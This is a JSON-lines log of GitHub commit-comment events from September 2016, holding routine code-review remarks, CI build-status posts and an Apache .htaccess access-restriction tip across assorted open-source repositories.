{"id":"4544712740","type":"CommitCommentEvent","actor":{"login":"AileenLumina"},"repo":{"name":"maorninja/Blargboard-XD"},"payload":{"comment":{"id":18974994,"position":null,"line":null,"path":null,"commit_id":"126559cd6c5335235d33b517efd81771bdbf1189","created_at":"2016-09-10T21:03:04Z","updated_at":"2016-09-10T21:03:04Z","body":"@phase Well you'd have to protect the .json of every rankset via Apache config, that's correct. Put the json into a separate folder and create a new `.htaccess` file in that folder, then add the following to that file:\r\n\r\n```apache\r\nOrder Deny,Allow\r\nDeny from all\r\nAllow from 127.0.0.1\r\n```\r\n\r\nThis effectively protects your rankset.json from being read, thus precents people being able to know ranks before you want them to."}},"created_at":"2016-09-10T21:03:04Z"}
{"id":"4544712882","type":"CommitCommentEvent","actor":{"login":"stfx"},"repo":{"name":"BatedUrGonnaDie/Autosplitters"},"payload":{"comment":{"id":18974996,"position":5,"line":3,"path":"Refunct/Refunct.asl","commit_id":"bda6812e4cfbb8056ed1a4f722dae226d7be309b","created_at":"2016-09-10T21:03:10Z","updated_at":"2016-09-10T21:03:10Z","body":"Seems like you found a pointer path that was working for everyone (me included). Thanks for your work! I just pushed one more update which should be the final one for a little while if nothing else breaks. Hopefully it does not cause too much work. Cheers!"}},"created_at":"2016-09-10T21:03:10Z"}
{"id":"4544713928","type":"CommitCommentEvent","actor":{"login":"LionH"},"repo":{"name":"ChessCorp/chess-club"},"payload":{"comment":{"id":18974997,"position":null,"line":null,"path":null,"commit_id":"de5dd9528e13c6528ddb98bf3b19a2e2b908b12a","created_at":"2016-09-10T21:04:02Z","updated_at":"2016-09-10T21:04:02Z","body":"b.c is not a valid email domain"}},"created_at":"2016-09-10T21:04:02Z"}
{"id":"4544714077","type":"CommitCommentEvent","actor":{"login":"hovhanneskhalatyan"},"repo":{"name":"SergeyHar/MediaPlayer"},"payload":{"comment":{"id":18974998,"position":25,"line":25,"path":"src/am/ACA/controller/implementations/Controller.java","commit_id":"0c3deaba70d10d5cd3d89ebf4a68c08ddf1da30a","created_at":"2016-09-10T21:04:09Z","updated_at":"2016-09-10T21:04:09Z","body":"Repositoryiner@ petq e linen singleton "}},"created_at":"2016-09-10T21:04:09Z"}
{"id":"4544714139","type":"CommitCommentEvent","actor":{"login":"CelticMinstrel"},"repo":{"name":"wesnoth/wesnoth"},"payload":{"comment":{"id":18974999,"position":152,"line":929,"path":"src/game_launcher.cpp","commit_id":"dcd037e5302109d5943607173dff2c0684ffa38f","created_at":"2016-09-10T21:04:11Z","updated_at":"2016-09-10T21:04:11Z","body":"Why are you asserting on the nonexistence of the load data?"}},"created_at":"2016-09-10T21:04:11Z"}
{"id":"4544714814","type":"CommitCommentEvent","actor":{"login":"Diegoisawesome"},"repo":{"name":"Diegoisawesome/AwesomeMapEditor"},"payload":{"comment":{"id":18975000,"position":null,"line":null,"path":null,"commit_id":"781a7724a78076853762921718725b0955adc705","created_at":"2016-09-10T21:04:38Z","updated_at":"2016-09-10T21:04:38Z","body":"I would have preferred it not make another commit, but that's how editing from the website works."}},"created_at":"2016-09-10T21:04:38Z"}
{"id":"4544715760","type":"CommitCommentEvent","actor":{"login":"Amazinite"},"repo":{"name":"evan153/ES-Mod-Share"},"payload":{"comment":{"id":18975001,"position":null,"line":null,"path":null,"commit_id":"c5efac618f5cb15b5a07e73a0a28af8478cec624","created_at":"2016-09-10T21:05:18Z","updated_at":"2016-09-10T21:05:18Z","body":"xD"}},"created_at":"2016-09-10T21:05:18Z"}
{"id":"4544716231","type":"CommitCommentEvent","actor":{"login":"aeternalis2"},"repo":{"name":"aeternalis2/codexscripts"},"payload":{"comment":{"id":18975002,"position":null,"line":null,"path":null,"commit_id":"a9fb8827ee6f888a35d553a835b1f92e9105bfa9","created_at":"2016-09-10T21:05:39Z","updated_at":"2016-09-10T21:05:39Z","body":"Handily, if you have already rated a post, and call the rate function with a different rating, the new rating code will replace your old rating with the new rating. So there is no need for a check here anymore. \"Undo rating\" is included as a ratings choice to permit clearing all of your ratings on a user's posts."}},"created_at":"2016-09-10T21:05:39Z"}
{"id":"4544717360","type":"CommitCommentEvent","actor":{"login":"SemaiCZE"},"repo":{"name":"ReCodEx/api"},"payload":{"comment":{"id":18975005,"position":24,"line":24,"path":"app/V1Module/presenters/BrokerReportsPresenter.php","commit_id":"6df12551dcf2e61541a78ea6a640fc96a8fd8387","created_at":"2016-09-10T21:06:25Z","updated_at":"2016-09-10T21:06:25Z","body":"Is really FailureHelper the right variable name to inject?"}},"created_at":"2016-09-10T21:06:25Z"}
{"id":"4544717382","type":"CommitCommentEvent","actor":{"login":"Spasi"},"repo":{"name":"LWJGL/lwjgl3"},"payload":{"comment":{"id":18975006,"position":null,"line":null,"path":null,"commit_id":"8622bcc8797ec7e5b01fcab94465ad86e8f9871d","created_at":"2016-09-10T21:06:26Z","updated_at":"2016-09-10T21:06:26Z","body":"It's just an experiment atm. Seems to be working nicely on Windows and Linux, but doesn't work on MacOS.  I'll update this branch when I've done more testing."}},"created_at":"2016-09-10T21:06:26Z"}
{"id":"4544717619","type":"CommitCommentEvent","actor":{"login":"hovhanneskhalatyan"},"repo":{"name":"SergeyHar/MediaPlayer"},"payload":{"comment":{"id":18975008,"position":90,"line":90,"path":"src/am/ACA/controller/implementations/Controller.java","commit_id":"0c3deaba70d10d5cd3d89ebf4a68c08ddf1da30a","created_at":"2016-09-10T21:06:35Z","updated_at":"2016-09-10T21:06:35Z","body":"bolor command ner@ karan linen Enum i mej\r\n\"Sign In\", \"Sign Up\" ... "}},"created_at":"2016-09-10T21:06:35Z"}
{"id":"4544717632","type":"CommitCommentEvent","actor":{"login":"backdrop-ci"},"repo":{"name":"backdrop/backdrop"},"payload":{"comment":{"id":18975009,"position":null,"line":null,"path":null,"commit_id":"3b04d60a5566da4e975826e716dd499dfbf7fd10","created_at":"2016-09-10T21:06:35Z","updated_at":"2016-09-10T21:06:35Z","body":"Related to: backdrop/backdrop-issues#2142 "}},"created_at":"2016-09-10T21:06:35Z"}
{"id":"4544718181","type":"CommitCommentEvent","actor":{"login":"taketwo"},"repo":{"name":"mp3guy/ElasticFusion"},"payload":{"comment":{"id":18975011,"position":352,"line":352,"path":"Core/src/Utils/RGBDOdometry.cpp","commit_id":"544da79fad6426fa6218dc5cef61acf4ac2e1822","created_at":"2016-09-10T21:06:59Z","updated_at":"2016-09-10T21:06:59Z","body":"Shouldn't it be `fabs(lastCount - lastSO3Count)`? Otherwise we are comparing apples with bananas."}},"created_at":"2016-09-10T21:06:59Z"}
{"id":"4544718378","type":"CommitCommentEvent","actor":{"login":"hovhanneskhalatyan"},"repo":{"name":"SergeyHar/MediaPlayer"},"payload":{"comment":{"id":18975012,"position":150,"line":150,"path":"src/am/ACA/controller/implementations/Controller.java","commit_id":"0c3deaba70d10d5cd3d89ebf4a68c08ddf1da30a","created_at":"2016-09-10T21:07:09Z","updated_at":"2016-09-10T21:07:09Z","body":"Util.playMusic.equals(null) sxal paymana"}},"created_at":"2016-09-10T21:07:09Z"}
{"id":"4544718798","type":"CommitCommentEvent","actor":{"login":"mpociot"},"repo":{"name":"mpociot/teamwork"},"payload":{"comment":{"id":18975014,"position":null,"line":null,"path":null,"commit_id":"783f0bfdd6f2d79acb0e37a77f16a5767d3b91fa","created_at":"2016-09-10T21:07:25Z","updated_at":"2016-09-10T21:07:25Z","body":"Because the migrations are now automatically handled by Laravel using the `$this->loadMigrationsFrom(__DIR__.'/../../database');` method"}},"created_at":"2016-09-10T21:07:25Z"}
{"id":"4544719643","type":"CommitCommentEvent","actor":{"login":"hovhanneskhalatyan"},"repo":{"name":"SergeyHar/MediaPlayer"},"payload":{"comment":{"id":18975016,"position":163,"line":163,"path":"src/am/ACA/controller/implementations/Controller.java","commit_id":"0c3deaba70d10d5cd3d89ebf4a68c08ddf1da30a","created_at":"2016-09-10T21:08:00Z","updated_at":"2016-09-10T21:08:00Z","body":"repository in play function chpetq e unena. Repositoryin menak bazayum grel kardalu hamara"}},"created_at":"2016-09-10T21:08:00Z"}
{"id":"4544720149","type":"CommitCommentEvent","actor":{"login":"hovhanneskhalatyan"},"repo":{"name":"SergeyHar/MediaPlayer"},"payload":{"comment":{"id":18975017,"position":171,"line":171,"path":"src/am/ACA/controller/implementations/Controller.java","commit_id":"0c3deaba70d10d5cd3d89ebf4a68c08ddf1da30a","created_at":"2016-09-10T21:08:19Z","updated_at":"2016-09-10T21:08:19Z","body":"repository in pause function chpetq e unena. Repositoryin menak bazayum grel kardalu hamara"}},"created_at":"2016-09-10T21:08:19Z"}
{"id":"4544720404","type":"CommitCommentEvent","actor":{"login":"adhg"},"repo":{"name":"adhg/pyDev1"},"payload":{"comment":{"id":18975018,"position":null,"line":null,"path":null,"commit_id":"9758ec4b41af6eb6f01655227f51e26a7582dbb9","created_at":"2016-09-10T21:08:32Z","updated_at":"2016-09-10T21:08:32Z","body":"I'm leaving a comment in github: test 525"}},"created_at":"2016-09-10T21:08:32Z"}
{"id":"4544720796","type":"CommitCommentEvent","actor":{"login":"stubailo"},"repo":{"name":"graphql/graphql.github.io"},"payload":{"comment":{"id":18975019,"position":26,"line":40,"path":"site/docs/BestPractice-ServingOverHTTP.md","commit_id":"a6f4e6c40bf2c7470a58a2ca20ac588208aadffd","created_at":"2016-09-10T21:08:49Z","updated_at":"2016-09-10T21:08:49Z","body":"I think that would be a good idea! Mind sending a PR for that?"}},"created_at":"2016-09-10T21:08:49Z"}
{"id":"4544721143","type":"CommitCommentEvent","actor":{"login":"hovhanneskhalatyan"},"repo":{"name":"SergeyHar/MediaPlayer"},"payload":{"comment":{"id":18975022,"position":176,"line":176,"path":"src/am/ACA/controller/implementations/Controller.java","commit_id":"0c3deaba70d10d5cd3d89ebf4a68c08ddf1da30a","created_at":"2016-09-10T21:09:03Z","updated_at":"2016-09-10T21:09:03Z","body":"repository in stop function chpetq e unena. Repositoryin menak bazayum grel kardalu hamara"}},"created_at":"2016-09-10T21:09:03Z"}
{"id":"4544721726","type":"CommitCommentEvent","actor":{"login":"fabricionaweb"},"repo":{"name":"bayorigin/diet"},"payload":{"comment":{"id":18975025,"position":null,"line":null,"path":null,"commit_id":"277dcf54a6559806b8682dc4d527cdd1f0b1fc23","created_at":"2016-09-10T21:09:29Z","updated_at":"2016-09-10T21:09:29Z","body":"How did you removed the `app.html = true`, now `$.end()` does not respond html content... \r\nI think you should switch to `$.html()` (but is not yet in the doc)"}},"created_at":"2016-09-10T21:09:29Z"}
{"id":"4544721840","type":"CommitCommentEvent","actor":{"login":"alexgit2k"},"repo":{"name":"sitaramc/gitolite"},"payload":{"comment":{"id":18975026,"position":null,"line":null,"path":null,"commit_id":"eb3f12f4d024937084ef52aecff82c390a4fa9c1","created_at":"2016-09-10T21:09:34Z","updated_at":"2016-09-10T21:09:34Z","body":"Neither bare nor non-bare repositores will have a trailing slash via the find-command.\r\nSo the part `unless $repo =~ m(/$)` does not skip any repository.\r\n"}},"created_at":"2016-09-10T21:09:34Z"}
{"id":"4544721893","type":"CommitCommentEvent","actor":{"login":"stubailo"},"repo":{"name":"graphql/graphql.github.io"},"payload":{"comment":{"id":18975027,"position":33,"line":47,"path":"site/docs/BestPractice-ServingOverHTTP.md","commit_id":"a6f4e6c40bf2c7470a58a2ca20ac588208aadffd","created_at":"2016-09-10T21:09:37Z","updated_at":"2016-09-10T21:09:37Z","body":"Personally I think it's odd to have a string of json inside json, so I'd be in favor of changing GraphiQL and getting rid of that format.. What do you think?"}},"created_at":"2016-09-10T21:09:37Z"}
{"id":"4544722284","type":"CommitCommentEvent","actor":{"login":"AlanMWalker"},"repo":{"name":"Foxlel-Games/Get-Dat-Boaty-Post-LD36-"},"payload":{"comment":{"id":18975029,"position":null,"line":null,"path":null,"commit_id":"43ec8e85cae7c351992441acbf54db4d1caf24db","created_at":"2016-09-10T21:09:54Z","updated_at":"2016-09-10T21:09:54Z","body":"#4 "}},"created_at":"2016-09-10T21:09:54Z"}
{"id":"4544722399","type":"CommitCommentEvent","actor":{"login":"StevenBlack"},"repo":{"name":"StevenBlack/hosts"},"payload":{"comment":{"id":18975030,"position":null,"line":null,"path":null,"commit_id":"91756b3889c581d76fddf760a51b07c762729edc","created_at":"2016-09-10T21:09:58Z","updated_at":"2016-09-10T21:09:58Z","body":"I wish Windows had a command equivalent to `which` on Unix and all its variants.  Or does it?"}},"created_at":"2016-09-10T21:09:58Z"}
{"id":"4544731484","type":"CommitCommentEvent","actor":{"login":"leletec"},"repo":{"name":"leletec/NameMemo"},"payload":{"comment":{"id":18975037,"position":21,"line":55,"path":"app/src/main/java/main/MainActivity.java","commit_id":"683c0bd19154536cd8f0384ad8c9948d7a459ca1","created_at":"2016-09-10T21:16:23Z","updated_at":"2016-09-10T21:16:23Z","body":"When Google admitted they fucked up...\r\n"}},"created_at":"2016-09-10T21:16:23Z"}
{"id":"4544731545","type":"CommitCommentEvent","actor":{"login":"hovhanneskhalatyan"},"repo":{"name":"SergeyHar/MediaPlayer"},"payload":{"comment":{"id":18975038,"position":12,"line":12,"path":"src/am/ACA/repository/implementations/AlbumRepository.java","commit_id":"0c3deaba70d10d5cd3d89ebf4a68c08ddf1da30a","created_at":"2016-09-10T21:16:25Z","updated_at":"2016-09-10T21:16:25Z","body":"public void add(AlbumRepository albumRepository) throws InvalidArgumentException\r\npetq e lini\r\npublic Album add(Album album) throws InvalidArgumentException;\r\ndu petqa voch te albumRepository add anes ayl album,\r\nmnacac methodneri hamar el nuyn sxaln es arel"}},"created_at":"2016-09-10T21:16:25Z"}
{"id":"4544732252","type":"CommitCommentEvent","actor":{"login":"hovhanneskhalatyan"},"repo":{"name":"SergeyHar/MediaPlayer"},"payload":{"comment":{"id":18975041,"position":6,"line":6,"path":"src/am/ACA/repository/implementations/TrackRepository.java","commit_id":"0c3deaba70d10d5cd3d89ebf4a68c08ddf1da30a","created_at":"2016-09-10T21:16:58Z","updated_at":"2016-09-10T21:16:58Z","body":"es repoi sax methodner@ sxal en."}},"created_at":"2016-09-10T21:16:58Z"}
{"id":"4544733224","type":"CommitCommentEvent","actor":{"login":"nrel-bot-2"},"repo":{"name":"NREL/EnergyPlus"},"payload":{"comment":{"id":18975042,"position":null,"line":null,"path":null,"commit_id":"a893c49b2d12958c632da18c6ff4f4f77880a9d7","created_at":"2016-09-10T21:17:41Z","updated_at":"2016-09-10T21:17:41Z","body":"#5853-Fancoil-cold/hot-water-control-failed-warnings (rraustad) - x86_64-Linux-Ubuntu-14.04-cppcheck-1.61: OK (0 of 0 tests passed, 0 test warnings)\n\n\n\n<a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-a893c49b2d12958c632da18c6ff4f4f77880a9d7-x86_64-Linux-Ubuntu-14.04-cppcheck-1.61.html'>![Build Badge](http://img.shields.io/badge/build%20status-passing-green.svg)</a>  \n"}},"created_at":"2016-09-10T21:17:41Z"}
{"id":"4544733241","type":"CommitCommentEvent","actor":{"login":"mp3guy"},"repo":{"name":"mp3guy/ElasticFusion"},"payload":{"comment":{"id":18975043,"position":352,"line":352,"path":"Core/src/Utils/RGBDOdometry.cpp","commit_id":"544da79fad6426fa6218dc5cef61acf4ac2e1822","created_at":"2016-09-10T21:17:42Z","updated_at":"2016-09-10T21:17:42Z","body":"I would say it should be fabs(lastError - lastSO3Error)."}},"created_at":"2016-09-10T21:17:42Z"}
{"id":"4544733791","type":"CommitCommentEvent","actor":{"login":"hovhanneskhalatyan"},"repo":{"name":"SergeyHar/MediaPlayer"},"payload":{"comment":{"id":18975044,"position":6,"line":6,"path":"src/am/ACA/repository/implementations/VoiceRepository.java","commit_id":"0c3deaba70d10d5cd3d89ebf4a68c08ddf1da30a","created_at":"2016-09-10T21:18:06Z","updated_at":"2016-09-10T21:18:06Z","body":"voice model u repository i chpetqa lini. Es methodner@ controlleri methodner petq e linen"}},"created_at":"2016-09-10T21:18:06Z"}
{"id":"4544734332","type":"CommitCommentEvent","actor":{"login":"hovhanneskhalatyan"},"repo":{"name":"SergeyHar/MediaPlayer"},"payload":{"comment":{"id":18975045,"position":9,"line":9,"path":"src/am/ACA/repository/interfaces/RepositoryInt.java","commit_id":"0c3deaba70d10d5cd3d89ebf4a68c08ddf1da30a","created_at":"2016-09-10T21:18:32Z","updated_at":"2016-09-10T21:18:32Z","body":"void add(T t) throws InvalidArgumentException;\r\npetq e lini\r\nT add(T t) throws InvalidArgumentException;"}},"created_at":"2016-09-10T21:18:32Z"}
{"id":"4544739954","type":"CommitCommentEvent","actor":{"login":"Gubriels"},"repo":{"name":"LilyMiranCox/BinSearch"},"payload":{"comment":{"id":18975051,"position":null,"line":null,"path":null,"commit_id":"65de157573716cc8ad62f6bb983f298c5f88d39b","created_at":"2016-09-10T21:22:32Z","updated_at":"2016-09-10T21:22:32Z","body":"I disagree."}},"created_at":"2016-09-10T21:22:32Z"}
{"id":"4544743430","type":"CommitCommentEvent","actor":{"login":"glerinsonum"},"repo":{"name":"jrmadsen67/MahanaMailinatorAPI"},"payload":{"comment":{"id":18975053,"position":null,"line":null,"path":null,"commit_id":"0472117104c9d056a8e5058b652e9f33a0764700","created_at":"2016-09-10T21:24:57Z","updated_at":"2016-09-10T21:24:57Z","body":"Hello @jrmadsen67 Can import those files MahanaMailinatorAPI into 000webhost ?\r\n"}},"created_at":"2016-09-10T21:24:57Z"}
{"id":"4544744583","type":"CommitCommentEvent","actor":{"login":"taketwo"},"repo":{"name":"mp3guy/ElasticFusion"},"payload":{"comment":{"id":18975054,"position":352,"line":352,"path":"Core/src/Utils/RGBDOdometry.cpp","commit_id":"544da79fad6426fa6218dc5cef61acf4ac2e1822","created_at":"2016-09-10T21:25:52Z","updated_at":"2016-09-10T21:25:52Z","body":"It's hard to choose a threshold to compare with ` fabs(lastError - lastSO3Error)`, it depends on the contents of the images and their size.  On the other hand, `fabs(lastCount - lastSO3Count) < 0.001` is effectively saying `lastCount == lastSO3Count`, which means that the number of overlapping pixels between unwarped and warped images did not change. Which effectively means that the last rotation increment did not result in any change in image space."}},"created_at":"2016-09-10T21:25:52Z"}
{"id":"4544747634","type":"CommitCommentEvent","actor":{"login":"hovhanneskhalatyan"},"repo":{"name":"Saq1194/MusicApp"},"payload":{"comment":{"id":18975057,"position":10,"line":10,"path":"src/am/aca/musicapp/repository/interfaces/PlayerRepositoryInterface.java","commit_id":"199fc3d1fea96be50e661214025f5ce3c0dd7113","created_at":"2016-09-10T21:28:23Z","updated_at":"2016-09-10T21:28:23Z","body":"repository-i layeri imast@ bazayum grel kardalna, es methodnert controlleri methodner en\r\nplaySong pauseSong stopStong ....\r\nqez Player Repository petq chi."}},"created_at":"2016-09-10T21:28:23Z"}
{"id":"4544748431","type":"CommitCommentEvent","actor":{"login":"Wexcode"},"repo":{"name":"trevorcai/react-starter"},"payload":{"comment":{"id":18975059,"position":24,"line":24,"path":"ui/search.jsx","commit_id":"4d329ed7f8ef919e88b690e0ed222129717b7308","created_at":"2016-09-10T21:29:02Z","updated_at":"2016-09-10T21:29:02Z","body":"Yeah, this goes back to what Jeff was talking about where creating an anonymous function creates a closure, whereas bind does not. @jeffsu"}},"created_at":"2016-09-10T21:29:02Z"}
{"id":"4544750449","type":"CommitCommentEvent","actor":{"login":"Slydelix"},"repo":{"name":"MarshRom/android_packages_apps_Settings"},"payload":{"comment":{"id":18975063,"position":4,"line":6063,"path":"res/values/strings.xml","commit_id":"8d16404f506df2797f85f529dd40ec278973884d","created_at":"2016-09-10T21:30:27Z","updated_at":"2016-09-10T21:30:27Z","body":"no1ce"}},"created_at":"2016-09-10T21:30:27Z"}
{"id":"4544751521","type":"CommitCommentEvent","actor":{"login":"Wexcode"},"repo":{"name":"jacksonbrodeur/react-starter"},"payload":{"comment":{"id":18975066,"position":1,"line":1,"path":"public/styles.css","commit_id":"2c33d63505a7f569704ffd29bf8dbd7778c9e762","created_at":"2016-09-10T21:31:13Z","updated_at":"2016-09-10T21:31:13Z","body":"CSS naming conventions generally use dash-separated-naming rather than camelCase."}},"created_at":"2016-09-10T21:31:13Z"}
{"id":"4544751548","type":"CommitCommentEvent","actor":{"login":"grayjay"},"repo":{"name":"haskell/cabal"},"payload":{"comment":{"id":18975067,"position":5,"line":278,"path":"cabal-install/tests/UnitTests/Distribution/Solver/Modular/DSL.hs","commit_id":"c36d11ff2e94458a51ae69368c84f1549ddba09c","created_at":"2016-09-10T21:31:15Z","updated_at":"2016-09-10T21:31:15Z","body":"I think this comment was out of date."}},"created_at":"2016-09-10T21:31:15Z"}
{"id":"4544752861","type":"CommitCommentEvent","actor":{"login":"budimanjojo"},"repo":{"name":"manjaro/packages-community"},"payload":{"comment":{"id":18975069,"position":null,"line":null,"path":null,"commit_id":"86995ac11c3ce888166a70ec462c66019ec78a27","created_at":"2016-09-10T21:32:06Z","updated_at":"2016-09-10T21:32:06Z","body":"The same problem from 3 years ago. https://github.com/zfsonlinux/spl/issues/308\r\n"}},"created_at":"2016-09-10T21:32:06Z"}
{"id":"4544753011","type":"CommitCommentEvent","actor":{"login":"JoeSSS"},"repo":{"name":"JoeSSS/calabash-ios"},"payload":{"comment":{"id":18975070,"position":16,"line":426,"path":"calabash-cucumber/lib/calabash-cucumber/automator/device_agent.rb","commit_id":"cac96b1c3f7286ec4d70200f2ec7ec0e5b2adb6c","created_at":"2016-09-10T21:32:10Z","updated_at":"2016-09-10T21:32:10Z","body":":)"}},"created_at":"2016-09-10T21:32:10Z"}
{"id":"4544753796","type":"CommitCommentEvent","actor":{"login":"arthurdejong"},"repo":{"name":"arthurdejong/python-stdnum"},"payload":{"comment":{"id":18975071,"position":null,"line":null,"path":null,"commit_id":"2c557a0c2e091487fcf9dfe00d3934208136501e","created_at":"2016-09-10T21:32:39Z","updated_at":"2016-09-10T21:32:39Z","body":"Good point. I've added a comment in 352aa8a."}},"created_at":"2016-09-10T21:32:39Z"}
{"id":"4544754772","type":"CommitCommentEvent","actor":{"login":"hisRoyalRudeness"},"repo":{"name":"elarnia/_basic"},"payload":{"comment":{"id":18975073,"position":null,"line":null,"path":null,"commit_id":"252d82032e67dd144e398b60810b0691da29aae3","created_at":"2016-09-10T21:33:20Z","updated_at":"2016-09-10T21:33:20Z","body":"\r\n[main.txt](https://github.com/elarnia/_basic/files/465649/main.txt)\r\n\r\n"}},"created_at":"2016-09-10T21:33:20Z"}
{"id":"4544756788","type":"CommitCommentEvent","actor":{"login":"kevmoo"},"repo":{"name":"kevmoo/firebase3-dart"},"payload":{"comment":{"id":18975076,"position":null,"line":null,"path":null,"commit_id":"462c9498cac7af8e351ad6ea5e39baf2a8acf75f","created_at":"2016-09-10T21:34:44Z","updated_at":"2016-09-10T21:34:44Z","body":"FYI @Janamou 😄 "}},"created_at":"2016-09-10T21:34:44Z"}
{"id":"4544759427","type":"CommitCommentEvent","actor":{"login":"fdaciuk"},"repo":{"name":"frontendbr/eventos"},"payload":{"comment":{"id":18975080,"position":55,"line":58,"path":"src/data/events.json","commit_id":"52202bdf1c8a23955df9627fb480095c59af1567","created_at":"2016-09-10T21:36:30Z","updated_at":"2016-09-10T21:36:30Z","body":"@theandersonn aqui pode deixar como \"08\", se for usar String =)\r\nSó remova o zero se for deixar como número mesmo, mas pode deixar como string com o zero que acho que, visualmente fica melhor =)"}},"created_at":"2016-09-10T21:36:30Z"}
{"id":"4544759891","type":"CommitCommentEvent","actor":{"login":"Wexcode"},"repo":{"name":"jacksonbrodeur/react-starter"},"payload":{"comment":{"id":18975081,"position":17,"line":17,"path":"src/omdb.js","commit_id":"2c33d63505a7f569704ffd29bf8dbd7778c9e762","created_at":"2016-09-10T21:36:52Z","updated_at":"2016-09-10T21:36:52Z","body":"An alternative syntax:\r\n\r\n    export async function searchMovies(title) {\r\n      const query = SEARCH_ENDPOINT + title;\r\n      const response = await fetch(query);\r\n      const json = await handleResponse(response);\r\n      return await handleJSON(json);\r\n    }"}},"created_at":"2016-09-10T21:36:52Z"}
{"id":"4544762024","type":"CommitCommentEvent","actor":{"login":"nrel-bot"},"repo":{"name":"NREL/EnergyPlus"},"payload":{"comment":{"id":18975085,"position":null,"line":null,"path":null,"commit_id":"a893c49b2d12958c632da18c6ff4f4f77880a9d7","created_at":"2016-09-10T21:38:37Z","updated_at":"2016-09-10T21:38:37Z","body":"#5853-Fancoil-cold/hot-water-control-failed-warnings (rraustad) - i386-Windows-7-VisualStudio-12: OK (2334 of 2334 tests passed, 0 test warnings)\n\n\n\n<a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-a893c49b2d12958c632da18c6ff4f4f77880a9d7-i386-Windows-7-VisualStudio-12.html'>![Build Badge](http://img.shields.io/badge/build%20status-passing-green.svg)</a> <a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-a893c49b2d12958c632da18c6ff4f4f77880a9d7-i386-Windows-7-VisualStudio-12.html'>![Test Badge](http://img.shields.io/badge/tests%20passed-100.0%25-green.svg)</a> \n"}},"created_at":"2016-09-10T21:38:37Z"}
{"id":"4544762884","type":"CommitCommentEvent","actor":{"login":"Wexcode"},"repo":{"name":"jacksonbrodeur/react-starter"},"payload":{"comment":{"id":18975086,"position":8,"line":8,"path":"src/omdb.js","commit_id":"2c33d63505a7f569704ffd29bf8dbd7778c9e762","created_at":"2016-09-10T21:39:21Z","updated_at":"2016-09-10T21:39:21Z","body":"I'm not too crazy about handing the no data case like this. Sure, you're effectively spoofing your component, but is that what you really want? I think you're better off returning an empty array and allowing your component to detect that and render an appropriate view accordingly."}},"created_at":"2016-09-10T21:39:21Z"}
{"id":"4544763249","type":"CommitCommentEvent","actor":{"login":"gustamora"},"repo":{"name":"gustamora/bob-johan-c-harahap"},"payload":{"comment":{"id":18975087,"position":1,"line":1,"path":"README.md","commit_id":"675d6e6c68e9b9086d9020f77e0973cde742b3d7","created_at":"2016-09-10T21:39:39Z","updated_at":"2016-09-10T21:39:39Z","body":"Leave a line note"}},"created_at":"2016-09-10T21:39:39Z"}
{"id":"4544764203","type":"CommitCommentEvent","actor":{"login":"Wexcode"},"repo":{"name":"jacksonbrodeur/react-starter"},"payload":{"comment":{"id":18975088,"position":43,"line":43,"path":"ui/MovieDisplay.jsx","commit_id":"2c33d63505a7f569704ffd29bf8dbd7778c9e762","created_at":"2016-09-10T21:40:23Z","updated_at":"2016-09-10T21:40:23Z","body":"Typically these are added in the class definition:\r\n\r\n    class MovieDisplay extends React.Component {\r\n      static propTypes = {\r\n        movie: React.PropTypes.object,\r\n      }\r\n    }"}},"created_at":"2016-09-10T21:40:23Z"}
{"id":"4544765335","type":"CommitCommentEvent","actor":{"login":"theandersonn"},"repo":{"name":"frontendbr/eventos"},"payload":{"comment":{"id":18975089,"position":null,"line":null,"path":null,"commit_id":"52202bdf1c8a23955df9627fb480095c59af1567","created_at":"2016-09-10T21:41:11Z","updated_at":"2016-09-10T21:41:11Z","body":"Ok.\r\n'0' de volta :)\r\nNesse update as thumbs já estão normais. "}},"created_at":"2016-09-10T21:41:11Z"}
{"id":"4544765566","type":"CommitCommentEvent","actor":{"login":"Wexcode"},"repo":{"name":"jacksonbrodeur/react-starter"},"payload":{"comment":{"id":18975091,"position":2,"line":2,"path":"ui/app.jsx","commit_id":"2c33d63505a7f569704ffd29bf8dbd7778c9e762","created_at":"2016-09-10T21:41:20Z","updated_at":"2016-09-10T21:41:20Z","body":"We actually attach this to the window for you in the `setup.jsx` file. We then tell `eslint` that `React` is a global so it doesn't yell at you."}},"created_at":"2016-09-10T21:41:20Z"}
{"id":"4544765719","type":"CommitCommentEvent","actor":{"login":"hovhanneskhalatyan"},"repo":{"name":"Vardan27/AddressBookJDBC"},"payload":{"comment":{"id":18975093,"position":2,"line":2,"path":"src/main/resources/addressbook.sql","commit_id":"d6d01d9d454dbd3c938826f9acdf1776af68fcab","created_at":"2016-09-10T21:41:26Z","updated_at":"2016-09-10T21:41:26Z","body":"porci foreign key el dnes tablenerumt\r\norinak addresses um userId in FK sarqi \r\nkam friends um idiner@ "}},"created_at":"2016-09-10T21:41:26Z"}
{"id":"4544767058","type":"CommitCommentEvent","actor":{"login":"hovhanneskhalatyan"},"repo":{"name":"Vardan27/AddressBookJDBC"},"payload":{"comment":{"id":18975094,"position":9,"line":9,"path":"src/main/java/am/aca/addressbook/repository/interfaces/CRUD.java","commit_id":"d6d01d9d454dbd3c938826f9acdf1776af68fcab","created_at":"2016-09-10T21:42:14Z","updated_at":"2016-09-10T21:42:14Z","body":"delete el kara exception qci ete id tas vor@ DB um chka"}},"created_at":"2016-09-10T21:42:14Z"}
{"id":"4544768054","type":"CommitCommentEvent","actor":{"login":"Wexcode"},"repo":{"name":"jacksonbrodeur/react-starter"},"payload":{"comment":{"id":18975095,"position":5,"line":5,"path":"ui/app.jsx","commit_id":"2c33d63505a7f569704ffd29bf8dbd7778c9e762","created_at":"2016-09-10T21:42:53Z","updated_at":"2016-09-10T21:42:53Z","body":"Webpack has an automatic discovery system called the [resolver](https://webpack.github.io/docs/configuration.html#resolve-extensions) so you don't actually have to put `.jsx` as the extension when you import."}},"created_at":"2016-09-10T21:42:53Z"}
{"id":"4544769472","type":"CommitCommentEvent","actor":{"login":"Wexcode"},"repo":{"name":"jacksonbrodeur/react-starter"},"payload":{"comment":{"id":18975096,"position":21,"line":21,"path":"ui/app.jsx","commit_id":"2c33d63505a7f569704ffd29bf8dbd7778c9e762","created_at":"2016-09-10T21:43:46Z","updated_at":"2016-09-10T21:43:46Z","body":"I'd probably add some whitespace between `super` and `this.state` to help separate the logic in this function and make it more readable."}},"created_at":"2016-09-10T21:43:46Z"}
